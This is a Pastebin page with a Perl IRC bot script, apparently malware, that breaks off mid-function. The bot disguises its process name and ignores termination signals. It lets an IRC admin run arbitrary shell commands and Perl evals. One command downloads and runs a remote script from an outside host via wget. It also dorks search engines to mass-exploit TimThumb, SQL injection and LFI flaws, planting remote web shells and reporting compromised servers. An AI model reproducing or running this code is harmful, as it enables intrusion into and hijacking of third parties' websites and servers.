Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- #################################################
- $powered="jembot"; #
- $mail="root@jem.bot"; #
- #################################################
- #################PERL MODULES####################
- use HTTP::Request; #
- use HTTP::Request::Common; #
- use HTTP::Request::Common qw(POST); #
- use LWP::Simple; #
- use LWP 5.53; #
- use LWP::UserAgent; #
- use Socket; #
- use IO::Socket; #
- use IO::Socket::INET; #
- use IO::Select; #
- use URI::URL; #
- ################BASIC CONNECTING#################
- my $datetime = localtime; #
- my $fakeproc = "/usr/sbin/apache45"; #
- my $ircserver = "irc.byroe.net"; #
- my $ircport = "6667"; #
- my $nickname = "ef-{".int(rand(100))."}"; #
- my $ident = "HAcKeD"; #
- my $channel = "#non"; #
- my $admin = "Egypt-Hacker"; #
- my $fullname = "INFO"; #
- #################################################
- ####################LOGO####################################
- my $nob0dy = "15(9@13nob0dy15)"; #
- my $vulN = "15(9@6VuLn!15)"; #
- my $thumblogo = "15(9@11ThuMB15)"; #
- my $sqllogo = "15(9@11SQL15)"; #
- my $lfilogo = "15(9@11Lfi15)"; #
- ##################COMMAND####################################
- my $thumbcmd = '!thumb'; #
- my $sqlcmd = '!sql'; #
- my $lficmd = '!lfi'; #
- ##################INJECTOR########################################
- my $injector = "http://pastebin.com/raw.php?i=izAyQE2f"; #
- my $thumbshell = "http://picasa.com.nabbc.org/w00t.php"; #
- my $bot = "http://picasa.com.nabbc.org/bot.php"; #
- my $lfiinjector = "http://pastebin.com/raw.php?i=ukHveP61"; #
- my $shellbot = "http://picasa.com.nabbc.org/r0x"; #
- ##################################################################
- ########################################TIMTHUMB PATH#######################################################
- my $folder1 = "/cache/35bac048e7c81f26c86c56ed8178e44f.php"; #
- my $folder2 = "/cache/external_35bac048e7c81f26c86c56ed8178e44f.php"; #
- my $folder3 = "/temp/35bac048e7c81f26c86c56ed8178e44f.php"; #
- my $folder4 = "/temp/external_35bac048e7c81f26c86c56ed8178e44f.php"; #
- my $folder5 = "/wp-content/uploads/thumb-temp/35bac048e7c81f26c86c56ed8178e44f.php"; #
- my $bot1 = "/cache/5291c5d1b8b6fb1c761b1e96b0c3f0ee.php"; #
- my $bot2 = "/cache/external_5291c5d1b8b6fb1c761b1e96b0c3f0ee.php"; #
- my $bot3 = "/temp/5291c5d1b8b6fb1c761b1e96b0c3f0ee.php"; #
- my $bot4 = "/temp/external_5291c5d1b8b6fb1c761b1e96b0c3f0ee.php"; #
- my $bot5 = "/wp-content/uploads/thumb-temp/5291c5d1b8b6fb1c761b1e96b0c3f0ee.php"; # #
- ############################################################################################################
- my @uagents = ("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6");
- my $uagent = $uagents[rand(scalar(@uagents))];
- $SIG{'INT'} = 'IGNORE';
- $SIG{'HUP'} = 'IGNORE';
- $SIG{'TERM'} = 'IGNORE';
- $SIG{'CHLD'} = 'IGNORE';
- $SIG{'PS'} = 'IGNORE';
- $ircserver = "$ARGV[0]" if $ARGV[0];
- $0 = "$fakeproc"."\0" x 16;;
- my $pid = fork;
- exit if $pid;
- die "\n[!] Something Wrong !!!: $!\n\n" unless defined($pid);
- our %irc_servers;
- our %DCC;
- my $dcc_sel = new IO::Select->new();
- $sel_client = IO::Select->new();
- sub sendraw {
- if ($#_ == '1') {
- my $socket = $_[0];
- print $socket "$_[1]\n";
- } else {
- print $IRC_cur_socket "$_[0]\n";
- }
- }
- sub connector {
- my $mynick = $_[0];
- my $ircserver_con = $_[1];
- my $ircport_con = $_[2];
- my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);
- if (defined($IRC_socket)) {
- $IRC_cur_socket = $IRC_socket;
- $IRC_socket->autoflush(1);
- $sel_client->add($IRC_socket);
- $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
- $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";
- $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
- $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;
- nick("$mynick");
- my $versi = "15[!]11TimThumB bot 04(09,01s4l1ty04) 15[!]";
- sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$versi");
- sleep (1);}}
- sub parse {
- my $servarg = shift;
- if ($servarg =~ /^PING \:(.*)/) {
- sendraw("PONG :$1");
- }
- elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
- if (lc($1) eq lc($mynick)) {
- $mynick = $4;
- $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
- }
- }
- elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
- nick("$mynick".int rand(1));
- }
- elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
- $mynick = $2;
- $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
- $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
- sendraw("MODE $mynick +iB");
- sendraw("JOIN $channel");
- sleep(2);
- sendraw("PRIVMSG $channel :14[04!14]11TimhuMB BoT 09,01Up09...04!");
- }
- }
- my $line_temp;
- while( 1 ) {
- while (!(keys(%irc_servers))) { &connector("$nickname", "$ircserver", "$ircport"); }
- select(undef, undef, undef, 0.01);;
- delete($irc_servers{''}) if (defined($irc_servers{''}));
- my @ready = $sel_client->can_read(0);
- next unless(@ready);
- foreach $fh (@ready) {
- $IRC_cur_socket = $fh;
- $mynick = $irc_servers{$IRC_cur_socket}{'nick'};
- $nread = sysread($fh, $ircmsg, 4096);
- if ($nread == 0) {
- $sel_client->remove($fh);
- $fh->close;
- delete($irc_servers{$fh});
- }
- @lines = split (/\n/, $ircmsg);
- $ircmsg =~ s/\r\n$//;
- if ($ircmsg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
- my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5);
- my $engine ="GooGLe,ReDiff,Bing,ALtaViSTa,AsK,UoL,CluSty,GutSer,GooGle2,ExaLead,VirgiLio,WebDe,AoL,SaPo,DuCk,YauSe,BaiDu,KiPoT,GiBLa,YahOo,HotBot,LyCos,LyGo,BLacK,oNeT,SiZuka,WaLLa,DeMos,RoSe,SeZnaM,TisCali,NaVeR,DooGatE,sogou,interia,snz,yandex,joeant,terra,youdao,amfibi,bigclique,dancefloor,live,rakuten,biglobe,nova,najdi,goo,uksubmit,excite";
- if ($path eq $mynick) {
- if ($msg =~ /^PING (.*)/) {
- sendraw("NOTICE $nick :PING $1");
- }
- if ($msg =~ /^VERSION/) {
- sendraw("NOTICE $nick :VERSION TimThumb Bot scanner by s4l1ty");
- }
- if ($msg =~ /^TIME/) {
- sendraw("NOTICE $nick :TIME ".$datetime."");
- }
- if (&isAdmin($nick) && $msg eq "!die") {
- &shell("$path","kill -9 $$");
- }
- if (&isAdmin($nick) && $msg eq "!killall") {
- &shell("$path","killall -9 perl;wget http://picasa.com.nabbc.org/r0x -O paste.jpg;perl paste.jpg;rm paste.jpg");
- }
- if (&isAdmin($nick) && $msg eq "!reset") {
- sendraw("QUIT :Restarting...");
- }
- if (&isAdmin($nick) && $msg eq "!rehash") {
- sendraw("QUIT : Rehasing...");
- &shell("$path","kill -9 $$;perl '.$0");
- }
- if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
- sendraw("JOIN #".$1);
- }
- if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
- sendraw("PART #".$1);
- }
- if (&isAdmin($nick) && $msg =~ /^!nick (.+)/) {
- sendraw("NICK ".$1);
- }
- if (&isAdmin($nick) && $msg =~ /^!pid/) {
- sendraw($IRC_cur_socket, "PRIVMSG $nick :09Fake Process/PID :04 $fakeproc - 11,01$$");
- }
- if (&isAdmin($nick) && $msg !~ /^!/) {
- &shell("$nick","$msg");
- }
- }
- else {
- if (&isAdmin($nick) && $msg eq "!die") {
- &shell("$path","kill -9 $$");
- }
- if (&isAdmin($nick) && $msg eq "!killall") {
- &shell("$path","killall -9 perl;wget http://picasa.com.nabbc.org/r0x -O paste.jpg;perl paste.jpg;rm paste.jpg");
- }
- if (&isAdmin($nick) && $msg eq "!reset") {
- sendraw("QUIT :Restarting...");
- }
- if (&isAdmin($nick) && $msg eq "!rehash") {
- sendraw("QUIT : Rehasing...");
- &shell("$path","kill -9 $$;perl '.$0");
- }
- if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
- sendraw("JOIN #".$1);
- }
- if (&isAdmin($nick) && $msg eq "!part") {
- sendraw("PART $path");
- }
- if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
- sendraw("PART #".$1);
- }
- if (&isAdmin($nick) && $msg =~ /^\.x (.*)/) {
- &shell("$path","$1");
- }
- if (&isAdmin($nick) && $msg =~ /^$mynick (.*)/) {
- &shell("$path","$1");
- }
- if (&isAdmin($nick) && $msg =~ /^!eval (.*)/) {
- eval "$1";
- }
- ##################################################################### HELP COMMAND
- if ($msg=~ /^!help/) {
- my $helplogo = "15(14@03Help15";
- &msg("$path","$helplogo 15 #####################4[HELP]15##############################");
- &msg("$path","$helplogo 03 ( $sqlcmd [bug][dork] ) sql scan ");
- &msg("$path","$helplogo 03 ( $thumbcmd [bug][dork] ) TimThumb scan ");
- &msg("$path","$helplogo 03 ( $lficmd [bug][dork] ) TimThumb scan ");
- &msg("$path","$helplogo 15 6END HELP ===>");
- }
- if ($msg=~ /^!engine/) {
- my $enginelogo = "06(09@11eNgine6)";
- &msg("$path","$enginelogo 04GooGLe,Bing,ALtaViSTa,AsK,UoL,YahOo.");
- &msg("$path","$enginelogo 04Will Be Updated as soon");
- }
- if ($msg=~ /^!about/) {
- my $aboutlogo = "15(09@11About15)";
- &msg("$path","$aboutlogo 09,01Priv8 Bot 11v0.13");
- &msg("$path","$aboutlogo 09,01© Copy Right 2012 04s4l1ty");
- }
- if ($msg=~ /^!version/) {
- my $versionlogo = "15(09@11Version15)";
- &msg("$path","$versionlogo 13,11WordPress,Sql,Lfi 04fucker");
- }
- if ($msg=~ /^!respon/ || $msg=~ /^!id/) {
- if (&isFound($lfiinjector,"str_rot13")) {
- &msg("$path","15,1(9@11Injector15 => 4Ready!!!");
- } else {
- &msg("$path","15,01(09@11Injector15 => 12Undetected.");
- }
- }
- if (&isAdmin($nick) && $msg =~ /^!pid/) {
- ¬ice("$nick","PRIVMSG $nick :09Fake Process/PID :04 $fakeproc - 11,01$$");
- }
- #####################################################################
- if ($msg=~ /^!port\s+(.*?)\s+(.*)/ ) {
- my $hostip= "$1";
- my $portsc= "$2";
- my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $portsc, Proto =>'tcp', Timeout => 7);
- if ($scansock) {
- &msg("$path","15(9@11PORT15)7 $hostip : $portsc 9Accepted");
- }
- else {
- &msg("$path","15(9@11PORT15)7 $hostip : $portsc 4connection refused");
- }
- }
- if ($msg=~ /^!ip\s+(.*)/ ) {
- if (my $pid = fork) { waitpid($pid, 0); } else {
- if (fork) { exit; } else {
- my $ip = $1;
- &msg("$path","15(9@11IP15)7 Searching ".$ip." 6Location ...");
- my $website = "http://www.ipligence.com/geolocation";
- my ($useragent,$request,$response,%form);
- undef %form;
- $form{ip} = $ip;
- $useragent = LWP::UserAgent->new;
- $useragent->timeout(5);
- $request = POST $website,\%form;
- $response = $useragent->request($request);
- if ($response->is_success) {
- my $res = $response->content;
- if ($res =~ m/Your IP address is(.*)<br>City:(.*)<br\/>Country:(.*)<br>Continent:(.*)<br>Time/g) {
- my ($ipaddress,$city,$country,$continent) = ($1,$2,$3,$4);
- &msg("$path","15(9@11IP15)7IP Address : ".$ip."15 (9".$ipaddress."15 )");
- &msg("$path","15(9@11IP15)7 City : ".$ip."15 (9".$city."15 )");
- &msg("$path","15(9@11IP15)7 Country : ".$ip."15 (9".$country."15 )");
- &msg("$path","15(9@11IP15)7 Continent : ".$ip."15 (9".$continent."15 )");
- }
- else {
- &msg("$path","15(9@11IP15)7 ".$ip." 6not found in database");
- }
- }
- else {
- &msg("$path","15(9@11IP15)4 Cannot open IP database.");
- }
- }
- exit;
- }
- }
- if ($msg=~ /^!base64 (.*)$/ ) {
- if (my $pid = fork) { waitpid($pid, 0); } else {
- if (fork) { exit; } else {
- my $hash = $1;
- my $base64_encoded = encode_base64($hash);
- my $base64_decoded = decode_base64($hash);
- &msg("$path","15(9@11BASE6415)12 Decode : $base64_decoded");
- &msg("$path","15(9@11BASE6415)12 Encode : $base64_encoded");
- }
- exit;
- }
- }
- ##############################################################################
- if ($msg=~ /^$thumbcmd\s+(.+?)\s+(.*)/) {
- if (my $pid = fork) {
- waitpid($pid, 0);
- }
- else {
- if (fork) { exit; } else {
- my ($bug,$dork) = ($1,$2);
- &msg("$path","$thumblogo 6Dork :11 $dork");
- &msg("$path","$thumblogo 11Bugz :6 $bug");
- &msg("$path","$thumblogo 4Working.!!!");
- &timthumb_start($path,$bug,$dork,"GooGLe,AllTheWeb,Bing,ALtaViSTa,AsK,UoL,YahOo");
- }
- exit;
- }
- }
- #####################################################################
- if ($msg=~ /^$sqlcmd\s+(.+?)\s+(.*)/) {
- if (my $pid = fork) {
- waitpid($pid, 0);
- }
- else {
- if (fork) { exit; } else {
- my ($bug,$dork) = ($1,$2);
- &msg("$path","$sqllogo 6Dork :11 $dork");
- &msg("$path","$sqllogo 11Bugz :6 $bug");
- &msg("$path","$sqllogo 4Working.!!!");
- &sql_start($path,$bug,$dork,"GooGLe,AllTheWeb,Bing,ALtaViSTa,AsK,UoL,YahOo");
- }
- exit;
- }
- }
- #####################################################################
- if ($msg=~ /^$lficmd\s+(.+?)\s+(.*)/) {
- if (my $pid = fork) {
- waitpid($pid, 0);
- }
- else {
- if (fork) { exit; } else {
- my ($bug,$dork) = ($1,$2);
- &msg("$path","$lfilogo 6Dork :11 $dork");
- &msg("$path","$lfilogo 11Bugz :6 $bug");
- &msg("$path","$lfilogo 4Working.!!!");
- &lfi_start($path,$bug,$dork,"GooGLe,AllTheWeb,Bing,ALtaViSTa,AsK,UoL,YahOo");
- }
- exit;
- }
- }
- #####################################################################
- }
- }
- for(my $c=0; $c<= $#lines; $c++) {
- $line = $lines[$c];
- $line = $line_temp.$line if ($line_temp);
- $line_temp = '';
- $line =~ s/\r$//;
- unless ($c == $#lines) {
- parse("$line");
- } else {
- if ($#lines == 0) {
- parse("$line");
- } elsif ($lines[$c] =~ /\r$/) {
- parse("$line");
- } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
- parse("$line");
- } else {
- $line_temp = $line;
- }
- }
- }
- }
- }
- #########################################
- sub timthumb_start() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $dork = $_[2];
- my $engine = $_[3];
- if ($engine =~ /google/i) {
- if (my $pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &thumb($chan,$bug,$dork,"GooGLe");
- } exit; }
- }
- if ($engine =~ /alltheweb/i) {
- if (my $pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &thumb($chan,$bug,$dork,"AllTheWeb");
- } exit; }
- }
- if ($engine =~ /bing/i) {
- if (my $pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &thumb($chan,$bug,$dork,"Bing");
- } exit; }
- }
- if ($engine =~ /altavista/i) {
- if (my $pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &thumb($chan,$bug,$dork,"ALtaViSTa");
- } exit; }
- }
- if ($engine =~ /ask/i) {
- if (my $pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &thumb($chan,$bug,$dork,"AsK");
- } exit; }
- }
- if ($engine =~ /uol/i) {
- if (my $pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &thumb($chan,$bug,$dork,"UoL");
- } exit; }
- }
- if ($engine =~ /yahoo/i) {
- if (my $pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &thumb($chan,$bug,$dork,"YahOo");
- } exit; }
- }
- }
- #########################################
- sub sql_start() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $dork = $_[2];
- my $engine = $_[3];
- if ($engine =~ /google/i) {
- if (my $pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &sql($chan,$bug,$dork,"GooGLe");
- } exit; }
- }
- if ($engine =~ /alltheweb/i) {
- if (my $pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &sql($chan,$bug,$dork,"AllTheWeb");
- } exit; }
- }
- if ($engine =~ /bing/i) {
- if (my $pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &sql($chan,$bug,$dork,"Bing");
- } exit; }
- }
- if ($engine =~ /altavista/i) {
- if (my $pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &sql($chan,$bug,$dork,"ALtaViSTa");
- } exit; }
- }
- if ($engine =~ /ask/i) {
- if (my $pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &sql($chan,$bug,$dork,"AsK");
- } exit; }
- }
- if ($engine =~ /uol/i) {
- if (my $pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &sql($chan,$bug,$dork,"UoL");
- } exit; }
- }
- if ($engine =~ /yahoo/i) {
- if (my $pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &sql($chan,$bug,$dork,"YahOo");
- } exit; }
- }
- }
- #########################################
- sub lfi_start() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $dork = $_[2];
- my $engine = $_[3];
- if ($engine =~ /google/i) {
- if (my $pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &lfi($chan,$bug,$dork,"GooGLe");
- } exit; }
- }
- if ($engine =~ /alltheweb/i) {
- if (my $pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &lfi($chan,$bug,$dork,"AllTheWeb");
- } exit; }
- }
- if ($engine =~ /bing/i) {
- if (my $pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &lfi($chan,$bug,$dork,"Bing");
- } exit; }
- }
- if ($engine =~ /altavista/i) {
- if (my $pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &lfi($chan,$bug,$dork,"ALtaViSTa");
- } exit; }
- }
- if ($engine =~ /ask/i) {
- if (my $pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &lfi($chan,$bug,$dork,"AsK");
- } exit; }
- }
- if ($engine =~ /uol/i) {
- if (my $pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &lfi($chan,$bug,$dork,"UoL");
- } exit; }
- }
- if ($engine =~ /yahoo/i) {
- if (my $pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &lfi($chan,$bug,$dork,"YahOo");
- } exit; }
- }
- }
- #########################################
- sub lfi() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $dork = $_[2];
- my $engine = $_[3];
- my $count = 0;
- my @list = &search_engine($chan,$bug,$dork,$engine,$lfilogo);
- my $num = scalar(@list);
- if ($num > 0) {
- foreach my $site (@list) {
- $count++;
- if ($count == $num-1) { &msg("$chan","$lfilogo15(9@7$engine15)10 Scan finish..."); }
- my $dir = "../../../../../../../../../../../../../../../";
- my $test = "http://".$site.$bug.$dir."/proc/self/environ%0000";
- my $vuln = "http://".$site.$bug.$dir."09/proc/self/environ%0000";
- my $shell = "http://".$site.$bug.$dir."04/tmp/Crash%0000";
- my $html = get_content($test);
- if ($html =~ /DOCUMENT_ROOT=\// && $html =~ /HTTP_USER_AGENT=/) {
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- my $code = 'echo "s4l1ty#".php_uname()."#s4l1ty"; if(@copy("'.$lfiinjector.'","/tmp/Crash")) { echo "SUCCESS"; }';
- my $res = lfi_env_query($test,encode_base64($code));
- $res =~ s/\n//g;
- if ($res =~ /s4l1ty#(.*)#s4l1tySUCCESS/sg) {
- my $sys = $1;
- &msg("$chan","$lfilogo15(09@03$engine15)04 ".$shell." 15(9@3".$sys."15)$vulN");
- sleep(4);
- }
- elsif ($res =~ /s4l1ty#(.*)#s4l1ty/sg) {
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- my $sys = $1;
- my $upload = 'system("wget '.$lfiinjector.' -O /tmp/Crash");';
- my $upload1 = 'system("wget '.$botshell.' -O /tmp/w00t");';
- my $wget = lfi_env_query($test,encode_base64($upload)); sleep(2);
- my $wget1 = lfi_env_query($test,encode_base64($upload1)); sleep(2);
- my $check = get_content("http://".$site.$bug.$dir."/tmp/Crash%0000"); sleep(1);
- if ($check =~ /Hijacked by s4l1ty/) {
- &msg("$admin","$lfilogo15(09@03$engine15)04 ".$shell." 15(9@3".$sys."15)$vulN");
- sleep(2);
- }
- else {
- &msg("$chan","$lfilogo15(09@3$engine15)15(09@04SysTem15)4 ".$vuln." 15(09@03".$sys."15)$vulN");
- sleep(2);
- }
- } exit; }
- }
- else { &msg("$chan","$lfilogo15(09@3$engine15)15(09@06eNviRon15)06 ".$vuln.""); }
- } exit; } sleep(2);
- }
- }
- }
- }
- #########################################
- sub sql() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $dork = $_[2];
- my $engine = $_[3];
- my $count = 0;
- my @list = &search_engine($chan,$bug,$dork,$engine,$sqllogo);
- my $num = scalar(@list);
- if ($num > 0) {
- foreach my $site (@list) {
- $count++;
- if ($count == $num-1) { &msg("$chan","$sqllogo15(9@7$engine15)10 Scan finish..."); }
- my $test = "http://".$site.$bug."'";
- my $vuln = "http://".$site.$bug;
- my $sqlsite = "http://".$site.$bug;
- my $html = &get_content($test);
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- if ($html =~ m/You have an error in your SQL syntax/i || $html =~ m/Query failed/i || $html =~ m/SQL query failed/i ) {
- &msg("$chan","$sqllogo15(04@3$engine15)15(09@04MySQL15) 03,01".$vuln);}
- elsif ($html =~ m/ODBC SQL Server Driver/i || $html =~ m/Unclosed quotation mark/i || $html =~ m/Microsoft OLE DB Provider for/i ) {
- &msg("$chan","$sqllogo15(04@3$engine15)15(09@04MsSQL15) 03,01".$vuln);}
- elsif ($html =~ m/Microsoft JET Database/i || $html =~ m/ODBC Microsoft Access Driver/i || $html =~ m/Microsoft OLE DB Provider for Oracle/i ) {
- &msg("$chan","$sqllogo15(4@3$engine15)15(09@04MsAccess15) 03,01".$vuln);}
- elsif ($html =~ m/mysql_/i || $html =~ m/Division by zero in/i || $html =~ m/mysql_fetch_array/i ) {
- } exit; sleep(2); }
- }
- }
- }
- }
- #########################################
- sub thumb() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $dork = $_[2];
- my $engine = $_[3];
- my $count = 0;
- my @list = &search_engine($chan,$bug,$dork,$engine,$thumblogo);
- my $num = scalar(@list);
- if ($num > 0) {
- foreach my $site (@list) {
- $count++;
- if ($count == $num-1) {
- &msg("$chan","$thumblogo 15(09@03$engine15)2 Scan finish...");
- }
- my $vuln = "http://".$site.$bug."?src=".$thumbshell;
- my $bot = "http://".$site.$bug."?src=".$bot;
- my $cek = &get_content($vuln);sleep(2);&get_content($bot);sleep(2);
- if ($cek =~ /Unable to /i) {
- (my $tpath = $bug)=~ s{/[^/]+\z}{};
- my $vuln2 = "http://".$site.$tpath.$folder1;
- my $vuln3 = "http://".$site.$tpath.$folder2;
- my $vuln4 = "http://".$site.$tpath.$folder3;
- my $vuln5 = "http://".$site.$tpath.$folder4;
- my $vuln6 = "http://".$site.$folder5;
- my $exbot1 = "http://".$site.$tpath.$bot1;
- my $exbot2 = "http://".$site.$tpath.$bot2;
- my $exbot3 = "http://".$site.$tpath.$bot3;
- my $exbot4 = "http://".$site.$tpath.$bot4;
- my $exbot5 = "http://".$site.$bot5;
- my $runbot1 = &get_content($exbot1);sleep(3);
- my $runbot2 = &get_content($exbot2);sleep(3);
- my $runbot3 = &get_content($exbot3);sleep(3);
- my $runbot4 = &get_content($exbot4);sleep(2);
- my $runbot5 = &get_content($exbot5);sleep(2);
- my $backup = &get_content($runing);sleep(3);
- my $check1 = &get_content($vuln2);sleep(2);
- my $check2 = &get_content($vuln3);sleep(2);
- my $check3 = &get_content($vuln4);sleep(2);
- my $check4 = &get_content($vuln5);sleep(2);
- my $check5 = &get_content($vuln6);sleep(2);
- my $os = "";
- my $free = "";
- my $uid = "";
- if ($check1 =~ /JANCOK- exploit/i) {
- if ($check1 =~ m/color=red><b> (.*?)<br>/) {$os = $1;}
- if ($check1 =~ m/Total space: <b>(.*?)<\/b><br>/) {$free = $1;}
- if ($check1 =~ m/uid=(.*?)gid=/) {$uid = $1;}
- &msg("$admin","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln2."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
- &msg("$chan","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln2."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
- }
- if ($check2 =~ /JANCOK- exploit/i) {
- if ($check2 =~ m/color=red><b> (.*?)<br>/) {$os = $1;}
- if ($check2 =~ m/Total space: <b>(.*?)<\/b><br>/) {$free = $1;}
- if ($check2 =~ m/uid=(.*?)gid=/) {$uid = $1;}
- &msg("$admin","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln3."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
- &msg("$chan","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln3."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
- }
- if ($check3 =~ /JANCOK- exploit/i) {
- if ($check3 =~ m/color=red><b> (.*?)<br>/) {$os = $1;}
- if ($check3 =~ m/Total space: <b>(.*?)<\/b><br>/) {$free = $1;}
- if ($check3 =~ m/uid=(.*?)gid=/) {$uid = $1;}
- &msg("$admin","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln4."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
- &msg("$chan","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln4."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
- }
- if ($check4 =~ /JANCOK- exploit/i) {
- if ($check4 =~ m/color=red><b> (.*?)<br>/) {$os = $1;}
- if ($check4 =~ m/Total space: <b>(.*?)<\/b><br>/) {$free = $1;}
- if ($check4 =~ m/uid=(.*?)gid=/) {$uid = $1;}
- &msg("$admin","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln5."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
- &msg("$chan","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln5."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
- }
- if ($check5 =~ /JANCOK- exploit/i) {
- if ($check5 =~ m/color=red><b> (.*?)<br>/) {$os = $1;}
- if ($check5 =~ m/Total space: <b>(.*?)<\/b><br>/) {$free = $1;}
- if ($check5 =~ m/uid=(.*?)gid=/) {$uid = $1;}
- &msg("$admin","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln6."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
- &msg("$chan","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln6."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
- }
- }
- }
- }
- }
- #########################################
- sub search_engine() {
- my (@total,@clean);
- my $chan = $_[0];
- my $bug = $_[1];
- my $dork = $_[2];
- my $engine = $_[3];
- my $logo = $_[4];
- if ($engine eq "GooGLe") { my @google = google($dork); push(@total,@google); }
- if ($engine eq "AllTheWeb") { my @alltheweb = alltheweb($dork); push(@total,@alltheweb); }
- if ($engine eq "Bing") { my @bing = bing($dork); push(@total,@bing); }
- if ($engine eq "ALtaViSTa") { my @altavista = altavista($dork); push(@total,@altavista); }
- if ($engine eq "AsK") { my @ask = ask($dork); push(@total,@ask); }
- if ($engine eq "UoL") { my @uol = uol($dork); push(@total,@uol); }
- if ($engine eq "YahOo") { my @yahoo = yahoo($dork); push(@total,@yahoo); }
- @clean = clean(@total);
- &msg("$chan","$logo15(9@2$engine15) Total:14 (".scalar(@total).") Clean:14 (".scalar(@clean).")");
- return @clean;
- }
- #########################################
- sub isFound() {
- my $status = 0;
- my $link = $_[0];
- my $reqexp = $_[1];
- my $res = &get_content($link);
- if ($res =~ /$reqexp/) { $status = 1 }
- return $status;
- }
- sub get_content() {
- my $url = $_[0];
- my $ua = LWP::UserAgent->new(agent => $uagent);
- $ua->timeout(7);
- my $req = HTTP::Request->new(GET => $url);
- my $res = $ua->request($req);
- return $res->content;
- }
- ######################################### SEARCH ENGINE gibla
- sub google() {
- my @list;
- my $key = $_[0];
- for (my $i=0; $i<=1000; $i+=100){
- my $search = ("http://www.google.com/search?q=".key($key)."&num=100&filter=0&start=".$i);
- my $res = search_engine_query($search);
- while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {
- my $link = $1;
- if ($link !~ /google/){
- my @grep = links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub alltheweb() {
- my @list;
- my $key = $_[0];
- for (my $i=0; $i<=1000; $i+=100) {
- my $search = ("http://us.yhs4.search.yahoo.com/yhs/search?fr=alltheweb&cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$i);
- my $res = search_engine_query($search);
- while ($res =~ m/\*\*http%3a\/\/(.+?)\">/g) {
- my $link = $1;
- if ($link !~ /bingj|yahoo/) {
- $link =~ s/ //g;
- $link =~ s/%3f/\?/g;
